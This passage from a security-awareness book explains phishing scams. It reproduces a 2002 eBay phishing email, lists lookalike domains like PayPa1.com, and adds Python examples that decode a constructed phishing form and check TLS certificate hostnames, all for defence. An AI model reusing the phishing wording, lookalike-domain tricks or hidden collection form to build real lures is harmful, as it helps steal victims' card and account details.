A Note about E-commerce Web Sites



You probably know people who are reluctant to buy goods online, even from brand-name companies such as Amazon and eBay, or the Web sites of Old Navy, Target, or Nike. In a way, they're right to be suspicious. If your browser uses today's standard of 128-bit encryption, the information you send to any secure site leaves your computer encrypted. That data could in principle be decrypted with a great deal of effort, but it is probably not breakable in any reasonable amount of time, except perhaps by the National Security Agency (and the NSA, so far as we know, has shown no interest in stealing the credit card numbers of American citizens or in finding out who is ordering sexy videotapes or kinky underwear).

 

Such encrypted traffic could, in theory, be broken by anyone with enough time and resources. But really, what fool would go to all that effort to steal one credit card number when many e-commerce companies make the mistake of storing all their customer financial information unencrypted in their databases? Worse, a number of e-commerce companies that use one particular SQL database product compound the problem badly: they have never changed the default system administrator password for the program. When they took the software out of the box, the password was "null," and it's still "null" today. So the contents of the database are available to anyone on the Internet who decides to try to connect to the database server. These sites are under attack all the time, and information does get stolen without anyone being the wiser.

 

On the other hand, the same people who won't buy on the Internet because they're afraid of having their credit card information stolen have no problem buying with that same credit card in a brick-and-mortar store, or paying for lunch, dinner, or drinks with the card even in a back-street bar or restaurant they wouldn't take their mother to. Credit card receipts get stolen from these places all the time, or fished out of trash bins in the back alley. And any unscrupulous clerk or waiter can jot down your name and card info, or use a gadget readily available on the Internet, a card-swiping device that stores the data from any credit card passed through it, for later retrieval.

 

There are some hazards to shopping online, but it's probably as safe as shopping in a brick-and-mortar store. And the credit card companies offer you the same protection when you use your card online: if any fraudulent charges are made to the account, you're only responsible for the first $50.

So in my opinion, fear of shopping online is just another misplaced worry.

 

Edgar didn't notice any of the several tell-tale signs that something was wrong with this email (for example, the semicolon after the greeting line, and the garbled text about "our valued customer service with excellent service"). He clicked on the link, entered the information requested (name, address, phone number, and credit card information) and sat back to wait for the five-dollar credit to show up on his next credit-card bill. What showed up instead was a list of charges for items he never purchased.

 

Analyzing the Con

Edgar had been taken in by a commonplace Internet scam. It's a scam that comes in a variety of forms. One of them (detailed in Chapter 9) involves a decoy login screen created by the attacker that looks identical to the real thing. The difference is that the phony screen doesn't give access to the computer system that the user is trying to reach, but instead feeds his username and password to the hacker.

 

Edgar had been taken in by a scam in which the crooks had registered a Web site with the name "paypal-secure.com," which sounds as if it should be a secure page on the legitimate PayPal site, but it isn't. When he entered information on that site, the attackers got just what they wanted.

 


MITNICK MESSAGE

While not foolproof (no security is), whenever visiting a site that requests information you consider private, always ensure that the connection is authenticated and encrypted. And even more important, do not automatically click Yes in any dialog box that may indicate a security issue, such as an invalid, expired, or revoked digital certificate.

 

VARIATIONS ON THE VARIATION

How many other ways are there to deceive computer users into going to a bogus Web site where they provide confidential information? I don't suppose anyone has a valid, accurate answer, but "lots and lots" will serve the purpose.

 

The Missing Link

One trick pops up regularly: sending out an email that offers a tempting reason to visit a site, and provides a link for going directly to it. Except that the link doesn't take you to the site you think you're going to, because the link only resembles a link for that site. Here's another example that has actually been used on the Internet, again involving misuse of the name PayPal:

 

www.PayPai.com

 

At a quick glance, this looks as if it says PayPal. Even if the victim notices, he may think it's just a slight defect in the text that makes the "l" of Pal look like an "i." And who would notice at a glance that:

 

www.PayPa1.com

 

uses the number 1 instead of a lowercase letter L? There are enough people who accept misspellings and other misdirection to make this gambit continually popular with credit card bandits. When people go to the phony site, it looks like the site they expected to go to, and they blithely enter their credit card information. To set up one of these scams, an attacker only needs to register the phony domain name, send out his emails, and wait for suckers to show up, ready to be cheated.

 

In mid-2002, I received an email, apparently part of a mass mailing that was marked as being from "Ebay@ebay.com." The message is shown in Figure 8.1.

 


Figure 8.1. The link in this or any other email should be used with caution.

------------------------------------------------------------------------------------------------------------------

msg: Dear eBay User,

It has become very noticeable that another party has been corrupting your eBay account and has violated our User Agreement policy listed:

4. Bidding and Buying

You are obligated to complete the transaction with the seller if you purchase an item through one of our fixed price formats or are the highest bidder as described below. If you are the highest bidder at the end of an auction (meeting the applicable minimum bid or reserve requirements) and your bid is accepted by the seller, you are obligated to complete the transaction with the seller, or the transaction is prohibited by law or by this Agreement.

You received this notice from eBay because it has come to our attention that your current account has caused interruptions with other eBay members and eBay requires immediate verification for your account. Please verify your account or the account may become disabled. Click Here To Verify Your Account - http://error ebay.tripod.com

Designated trademarks and brands are the property of their respective owners, eBay and the eBay logo are trademarks of eBay Inc.

---------------------------------------------------------------------------------------------------------------------

 

 

Victims who clicked on the link went to a Web page that looked very much like an eBay page. In fact, the page was well designed, with an authentic eBay logo, and "Browse," "Sell" and other navigation links that, if clicked, took the visitor to the actual eBay site. There was also a security logo in the bottom right corner. To deter the savvy victim, the designer had even obfuscated the page's HTML (a trick sometimes loosely called "HTML encryption," though nothing about it is cryptographic) to mask where the user-provided information was being sent.
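How a page like this can hide the real destination of its form, and how to see through it, as an added example that is not from the book: the form markup is written out by a script from a percent-encoded string, which was one common way this kind of masking was done (the book does not say which technique this particular page used, so that is an assumption here). The sample page below is constructed for the example, and the tripod.com collection address in it is invented.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: an eBay-looking page whose <form> is emitted by
# document.write(unescape(...)) so that "view source" shows no action URL.
SAMPLE_PAGE = r'''
<html><body>
<img src="ebay_logo.gif"> <a href="http://www.ebay.com/browse">Browse</a>
<script>
document.write(unescape("%3Cform%20method%3Dpost%20action%3D%22http%3A%2F%2Fmembers.tripod.com%2F%7Eexample%2Fcollect.cgi%22%3E"))
</script>
PayPal user: <input name="paypal_user"> Card: <input name="card_number">
</form></body></html>
'''

# unescape("...") or unescape('...') string literals inside script blocks.
JS_UNESCAPE = re.compile(r'unescape\(\s*(["\'])(.*?)\1\s*\)', re.S)
# JavaScript \xHH escapes, the other cheap way to hide ASCII in a literal.
HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')
# action attribute of any <form>, quoted or not.
FORM_ACTION = re.compile(r'<form\b[^>]*\baction\s*=\s*["\']?([^"\'\s>]+)', re.I)


def decode_js_string(literal: str) -> str:
    """Undo \\xHH escapes and then percent-encoding, as unescape() would."""
    literal = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), literal)
    return unquote(literal)


def deobfuscate(html: str) -> str:
    """Replace every unescape("...") payload with its decoded text, so the
    markup the browser would really render becomes visible in the source."""
    return JS_UNESCAPE.sub(lambda m: decode_js_string(m.group(2)), html)


def form_destinations(html: str) -> list:
    """Hosts to which the page's forms post, after deobfuscation."""
    rendered = deobfuscate(html)
    return [urlsplit(action).hostname or action
            for action in FORM_ACTION.findall(rendered)]


def offsite_destinations(html: str, claimed_host: str) -> list:
    """Form targets that are not the site the page claims to be
    (claimed_host is the name the page is impersonating)."""
    claimed_host = claimed_host.lower()
    return [h for h in form_destinations(html)
            if h != claimed_host and not h.endswith("." + claimed_host)]
```

Run offsite_destinations(SAMPLE_PAGE, "www.ebay.com") and the hidden target, members.tripod.com, comes out even though the raw source never contains the string "action=". The comparison is against the site the page pretends to be, not the host it is actually served from, because a phishing page served from the same free host as its collection script would otherwise look consistent with itself.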

 

It was an excellent example of a malicious computer-based social engineering attack. Still, it was not without several flaws.

 

The email message was not well written; in particular, the paragraph beginning "You received this notice" is clumsy and inept (the people responsible for these hoaxes never hire a professional to edit their copy, and it always shows). Also, anybody who was paying close attention would have become suspicious about eBay asking for the visitor's PayPal information; there is no reason eBay would ask a customer for this private information involving a different company.

 

And anyone knowledgeable about the Internet would probably recognize that the hyperlink connects not to the eBay domain but to tripod.com, which is a free Web hosting service. This was a dead giveaway that the email was not legitimate. Still, I bet a lot of people entered their information, including a credit card number, onto this page.

 


NOTE

Why are people allowed to register deceptive or inappropriate domain names? Because under current law and online policy, anyone can register any site name that's not already in use.

 

Companies try to fight this use of copycat addresses, but consider what they're up against. General Motors filed suit against a company that registered f**kgeneralmotors.com (but without the asterisks) and pointed the URL to General Motors' Web site. GM lost.

 

 

Be Alert

As individual users of the Internet, we all need to be alert, making a conscious decision about when it's okay to enter personal information, passwords, account numbers, PINs, and the like.

 

How many people do you know who could tell you whether a particular Internet page they're looking at meets the requirements of a secure page? How many employees in your company know what to look for?

 

Everyone who uses the Internet should know about the little symbol that appears in the browser's own window frame (not in the page itself, where anyone can draw one) and looks like a padlock. They should know what a closed hasp actually means: the browser has made an encrypted connection, and the site presented a certificate, issued by an authority the browser trusts, for the name shown in the address bar. That is all it means; it does not vouch for whoever registered that name, so a lookalike domain with its own valid certificate shows a closed lock too. When the hasp is open or the lock icon is missing, the Web site is not authenticated as genuine, and any information transmitted is in the clear, that is, unencrypted.

 

However, an attacker who manages to gain administrative privileges on a company computer may be able to modify or patch the operating system or browser code to change the user's perception of what is really happening. For example, the instructions in the browser software that flag a Web site's digital certificate as invalid can be modified to bypass the check. Or the system can be modified with something called a rootkit, installing one or more back doors at the operating system level, which are harder to detect.

 

A secure connection authenticates the site as genuine, and encrypts the information being communicated, so an attacker cannot make use of any data that is intercepted. Can you trust any Web site, even one that uses a secure connection? No, because the site owner may not be vigilant about applying all the necessary security patches, or forcing users or administrators to respect good password practices. So you can't assume that any supposedly secure site is invulnerable to attack.

 


 

LINGO

BACK DOOR A covert entry point that provides a secret way into a user's computer, unknown to the user. Also used by programmers while developing a software program so that they can go into the program to fix problems.

 

HTTPS (HTTP carried over SSL, the secure sockets layer, or its successor TLS) provides an automatic mechanism that uses digital certificates not only to encrypt the information being sent to the distant site, but also to provide authentication (an assurance that you are communicating with the genuine Web site). However, this protection mechanism does not help users who fail to check whether the site name displayed in the address bar is in fact the correct address of the site they're trying to reach: the certificate only proves that you are talking to whatever name is in that bar.
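What the browser actually checks before it closes the padlock, as an added example that is not from the book and not any browser's code: a client that demands a certificate chaining to a trusted root plus a name match, and the name-matching rule of RFC 6125 applied to constructed certificates. The certificate dictionaries mimic the shape Python's ssl getpeercert() returns and are invented for this example; the lookalike and wildcard certificates in particular are hypothetical.

```python
import socket
import ssl


def make_strict_context() -> ssl.SSLContext:
    """Client settings that mirror the padlock rules: the server must
    present a certificate chaining to a trusted root (CERT_REQUIRED) and
    its name must match the host we asked for (check_hostname)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def hostname_matches(cert: dict, hostname: str) -> bool:
    """RFC 6125-style comparison of hostname against the certificate's DNS
    subjectAltName entries (the Common Name is ignored, as browsers now do).
    A wildcard counts only as the whole leftmost label, never across a
    dot, and never when it would cover a bare registrable domain (*.com)."""
    host_labels = hostname.lower().rstrip(".").split(".")
    for kind, value in cert.get("subjectAltName", ()):
        if kind != "DNS":
            continue
        pat_labels = value.lower().rstrip(".").split(".")
        if len(pat_labels) != len(host_labels) or pat_labels[1:] != host_labels[1:]:
            continue
        if pat_labels[0] == "*":
            if len(pat_labels) >= 3:
                return True
            continue
        if pat_labels[0] == host_labels[0]:
            return True
    return False


def fetch_peer_cert(host: str, port: int = 443, timeout: float = 5.0) -> dict:
    """Connect with the strict context. An untrusted chain, an expired
    certificate or a name mismatch raises ssl.SSLCertVerificationError,
    which is the condition behind the warning dialog the text describes."""
    ctx = make_strict_context()
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            return tls.getpeercert()


# Constructed certificates in the dict shape getpeercert() produces.
LEGIT_CERT = {"subjectAltName": (("DNS", "www.paypal.com"), ("DNS", "paypal.com"))}
LOOKALIKE_CERT = {"subjectAltName": (("DNS", "www.paypai.com"),)}   # hypothetical
WILDCARD_CERT = {"subjectAltName": (("DNS", "*.tripod.com"),)}      # hypothetical
```

Note the result for LOOKALIKE_CERT against www.paypai.com: it matches, and a certificate authority will happily issue such a certificate to whoever controls that domain, so the padlock closes and no dialog appears. The check protects the name in the address bar, and only the reader can check that the name is the one he meant.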

 

Another security issue, mostly ignored, appears as a warning message that says something like "This site is not secure or the security certificate has expired. Do you want to go to the site anyway?" Many Internet users don't understand the message, and when it appears, they simply click Okay or Yes and go on with their work, unaware that they may be on quicksand. Be warned: On a Web site that does not use a secure protocol, you should never enter any confidential information such as your address or phone number, credit card or bank account numbers, or anything else you want to keep private.

 

Thomas Jefferson said maintaining our freedom required "eternal vigilance." Maintaining privacy and security in a society that uses information as currency requires no less.

 

Becoming Virus Savvy

A special note about antivirus software: it is essential for the corporate intranet, but also essential for every employee who uses a computer. Beyond just having antivirus software installed on their machines, users obviously need to have the software turned on (which many people don't like because it inevitably slows down some computer functions).

 

With antivirus software there's another important procedure to keep in mind, as well: keeping the virus definitions up to date. Unless your company is set up to distribute software or updates over the network to every user, each individual user must carry the responsibility of downloading the latest set of virus definitions on his own. My personal recommendation is to have everyone set the virus software preferences so that new virus definitions are automatically updated every day.

LINGO

SECURE SOCKETS LAYER A protocol developed by Netscape that provides encryption and authentication of the server (and, optionally, of the client) in a secure communication on the Internet. Its successor is TLS, transport layer security.

 

Simply put, you're vulnerable unless the virus definitions are updated regularly. And even so, you're still not completely safe from viruses or worms that the antivirus software companies don't yet know about or haven't yet published a detection pattern file for.

 

All employees with remote access privileges from their laptops or home computers need to have updated virus software and a personal firewall on those machines at a minimum. A sophisticated attacker will look at the big picture to seek out the weakest link, and that's where he'll attack. Reminding people with remote computers regularly about the need for personal firewalls and updated, active virus software is a corporate responsibility, because you can't expect that individual workers, managers, sales people, and others remote from an IT department will remember the dangers of leaving their computers unprotected.

 

Beyond these steps, I strongly recommend use of the less common, but no less important, software packages that guard against Trojan Horse attacks, so-called anti-Trojan software. At the time of this writing, two of the better-known programs are The Cleaner (www.moosoft.com), and Trojan Defense Sweep (www.diamondcs.com.au).

 

Finally, what is probably the most important security message of all for companies that do not scan for dangerous emails at the corporate gateway: Since we all tend to be forgetful or negligent about things that seem peripheral to getting our jobs done, employees need to be reminded over and over again, in different ways, about not opening email attachments unless they are certain that the source is a person or organization they can trust. And management also needs to remind employees that they must use active virus software and anti-Trojan software that provides invaluable protection against the seemingly trustworthy email that may contain a destructive payload.

 


Chapter 8


